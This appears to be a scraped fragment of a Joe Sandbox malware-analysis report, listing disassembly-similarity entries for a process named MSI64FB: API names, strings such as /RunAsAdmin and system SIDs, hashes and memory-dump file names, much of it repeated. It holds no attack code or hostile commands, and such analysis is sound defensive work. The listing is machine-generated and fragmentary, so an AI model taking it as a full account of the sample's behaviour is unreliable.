                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc$Free__std_exception_copy
                                                                                                                                                                                                                                                    • String ID: ios_base::failbit set$iostream
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$Local_invalid_parameter_noinfo_noreturn$Cert$CertificateContext$#224NameString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal$Process_invalid_parameter_noinfo_noreturn$CloseCurrentErrorHandleLastOpenPathTempToken
                                                                                                                                                                                                                                                    • String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF749F5B452
                                                                                                                                                                                                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF749F5B416
                                                                                                                                                                                                                                                    • :AM:am:PM:pm, xrefs: 00007FF749F5B462
Similarity
• API ID: Maklocwcsstd::_$Yarn
• String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
• API String ID: 1194159078-3743323925
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
Similarity
• API ID: std::_$LocalLockit$AllocFreeGetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 65438402-1405518554
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$p$p
• API String ID: 3215553584-1995029353
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$p$p
• API String ID: 3215553584-1995029353
Similarity
• API ID: OpenQueryValue
• String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
• API String ID: 4153817207-1914306501
                                                                                                                                                                                                                                                    • Opcode ID: c1ea196034c89146bda3b9649a23863f6eb0936dcb2f13ed1610820584201723
                                                                                                                                                                                                                                                    • Instruction ID: d1a5cced6be270eb9a08dddaf27cf65209f8cf9e244e3d59e8169b92876ab129
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1ea196034c89146bda3b9649a23863f6eb0936dcb2f13ed1610820584201723
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F1D666F0D652D1EB60BF559010AB9A2F0EF50B98FCA8431DA49072D6EF3CFA51C360
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LocalWindow$AllocConcurrency::cancel_current_taskFreeLongProcessThread_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2769903829-0
                                                                                                                                                                                                                                                    • Opcode ID: 35574c92888c2c26300d35ec6ef1cb4377479981c8a04ba66c72df11c085166f
                                                                                                                                                                                                                                                    • Instruction ID: 0efc47a2482c76d429289cf3a629f72778695de7818e537eaf265f34f317e975
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35574c92888c2c26300d35ec6ef1cb4377479981c8a04ba66c72df11c085166f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46517C7271CA41C2EB14AF69E5406AAA2A1EB547D0FA48635EBAD07BD4DF3CD091C710
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocGetctypeLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 229129721-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 60ebc02f7226483f3ff1111ec5c75b1086ff5987c5adef6584f18516984502ac
                                                                                                                                                                                                                                                    • Instruction ID: 9854bc3a0703ebe0a4a08ef05cb6f5040e4f60086155eb5af15a0424c94fbcc1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ebc02f7226483f3ff1111ec5c75b1086ff5987c5adef6584f18516984502ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08518922B0EB41DAFB04FFA0D4506EDB3B5EB54B48F885935DA4D23A85EF38D5218364
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_FreeLocalRegister
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4216899657-0
                                                                                                                                                                                                                                                    • Opcode ID: 5edf41230aeef18f27619a6f764b7c9603305eeb89fed7b8c1b45b463f960f5c
                                                                                                                                                                                                                                                    • Instruction ID: 7fe5df7fc6baead8ca2d6f19eabcf29b62ff84f6490ab6aa142795d7bb4c12bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5edf41230aeef18f27619a6f764b7c9603305eeb89fed7b8c1b45b463f960f5c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F341A022A5DA42D5EB09BF55E8502B8B370EB94BA4FD81131DA4D077E6DF7CE482C720
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$BringEnumFreeLocalProcessWindowWindows_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2996238595-0
                                                                                                                                                                                                                                                    • Opcode ID: d554edbeff9a9736a78683e7aa15fcf636b5e02c3c9ef89d9e6f44d3e1e993a4
                                                                                                                                                                                                                                                    • Instruction ID: 1000cf8495098da099f075be9a84902547c7b09d54007913b887bfea87e49fa9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d554edbeff9a9736a78683e7aa15fcf636b5e02c3c9ef89d9e6f44d3e1e993a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD316D22B5DA81C5EF10BF95E444669A371EB94B90F941232EA9E13BE8CF3CE5808710
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D5D1
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D5DF
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D609
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D677
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D683
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: 42257dd58315f7643f482914cd2c497e8c06dc2da1f724419a6d3b55d7fd13f2
                                                                                                                                                                                                                                                    • Instruction ID: c8128bf6aae2fb2ab6751c97c2d766d3c85fec0fb7fa77726cdc0f80f7ab373d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42257dd58315f7643f482914cd2c497e8c06dc2da1f724419a6d3b55d7fd13f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF318121B1EA42D1EF51BF46E800575A3B4BF48B68FD90576EE1D0A7D4EE3CE4418720
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • :AM:am:PM:pm, xrefs: 00007FF749F5B381
                                                                                                                                                                                                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF749F5B363
                                                                                                                                                                                                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF749F5B322
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Maklocstr
                                                                                                                                                                                                                                                    • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                                                                                                    • API String ID: 2987148671-35662545
                                                                                                                                                                                                                                                    • Opcode ID: 8867adb2efc359ccc5cf0888d9ee80204fd664f335f1ca01bc21afa1361553cf
                                                                                                                                                                                                                                                    • Instruction ID: 3c096a839acde5b6f7e625710e51b28d844b585e232adda066e1a46b2b3959cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8867adb2efc359ccc5cf0888d9ee80204fd664f335f1ca01bc21afa1361553cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC214B62A19B45C5EB10FF21E4412A9B7B5EB98B80F898231DA4D13796DF3CE182C750
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastLibrary$AddressCloseDirectoryFreeHandleLoadOpenProcProcessSystem
                                                                                                                                                                                                                                                    • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                    • API String ID: 3957113498-2781105232
                                                                                                                                                                                                                                                    • Opcode ID: 50f8b74b772799a49a32d1d3bf22bba6da5a932b56011529cbe8cc636982945b
                                                                                                                                                                                                                                                    • Instruction ID: 321134ff1eaff8a60c8164bf0e4893fed9617f93c60fc70b7e219fd65d20b10f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50f8b74b772799a49a32d1d3bf22bba6da5a932b56011529cbe8cc636982945b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3314C32A1DB81C6E750FF11B4407AAA3B0FBD4790F945135EA8D43AA8DF3CE5858B11
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                    • Opcode ID: 5465c1afd9a73e2e95b374ed2fdb82802a84666fe34a4e0e565d8d339bcb1e90
                                                                                                                                                                                                                                                    • Instruction ID: 678790321076129863192ceb23993ce025397839509a7ff3d87c810a1fc9cd86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5465c1afd9a73e2e95b374ed2fdb82802a84666fe34a4e0e565d8d339bcb1e90
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B116A21B1CA41C6E751AF96E854329A2B0BB99BA4F904234EA5D87BE4DF3CD404C754
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2984826149-0
                                                                                                                                                                                                                                                    • Opcode ID: 66e74323a14d1237dec483e39549143d7bd7bee4ec2659615b9cae67baf7f054
                                                                                                                                                                                                                                                    • Instruction ID: 4c6129991a7f583f234ae6e592b04191b5db69fd1f7b320e1b2f42cb8e134707
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66e74323a14d1237dec483e39549143d7bd7bee4ec2659615b9cae67baf7f054
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EA1B322B1DA82CAFB21BF1484503B9A6B1EF84BA8FD446B1EA5D077D5DF3DD5448320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2829165498-0
                                                                                                                                                                                                                                                    • Opcode ID: 3c0acbd00b743a7012fd7b87341e47bb8f94db9b826abeb19d5b1ae6d54c1ea2
                                                                                                                                                                                                                                                    • Instruction ID: fcbc9da07b2833a060cff8f3ad740ae2ce75801f1fd0207bb72d663a09c7dad1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c0acbd00b743a7012fd7b87341e47bb8f94db9b826abeb19d5b1ae6d54c1ea2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9819172A1DB41C6EB60BF65A440279B6B5FB847A8F940275FA5D47BD8DF3CD4008B20
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
Similarity
• API ID: Local$Free$AllocConcurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
Similarity
• API ID: Local$Alloc_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFree
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
APIs
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 006285de0621515d359ce12fc345f66d1627c98e70f5238c8fa960e55dcfbf37
                                                                                                                                                                                                                                                    • Instruction ID: bdf1ca29ba6135901cc90351eef1d136b33e7eb354e6c6c6d9db63ab3250bb78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 006285de0621515d359ce12fc345f66d1627c98e70f5238c8fa960e55dcfbf37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16318062A0CA46D1EB09BF65E4441B8E371EB54BB4F8A0231DA1D477E6DE7CF542C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: b4f9e0c4c4a88189330b8026f74b10148109776af48481e52f8805c03750c11c
                                                                                                                                                                                                                                                    • Instruction ID: beb0f9f3bc65a833981cdbb508a137f35e0d4e82dc696d61aec0a8dcd2549fa1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4f9e0c4c4a88189330b8026f74b10148109776af48481e52f8805c03750c11c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B318122B0DA42D1FB09BF55E4845B8E371EB54BB0F980271EA4D476E5DE7CE586C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: ff08806b4226c0067b6b0812c526be4dac25bd622191c0632b052790350db230
                                                                                                                                                                                                                                                    • Instruction ID: 4c04dcab7e18e57ab6703ecac34706ce7bb91badb7d013014522318e226f5430
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff08806b4226c0067b6b0812c526be4dac25bd622191c0632b052790350db230
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1318222A1DA46D1EB09BF55E4801B8E371EB55BB4F8A0131DA0D476E6DE7CF542C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 8dbff8bf7bcca8e6b7daddbe81a1f843d72d1fc32ee4c2ed7e84790663cf9c26
                                                                                                                                                                                                                                                    • Instruction ID: 7bf43d3e5f8a28d658f49d88036cc7f429b365365d0b6432473c619d73d246fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dbff8bf7bcca8e6b7daddbe81a1f843d72d1fc32ee4c2ed7e84790663cf9c26
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E31A222B0CA42C5FB09BF59E4805B9E371EB54BA4FD80231EA1D076E5EE7CE446C360
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
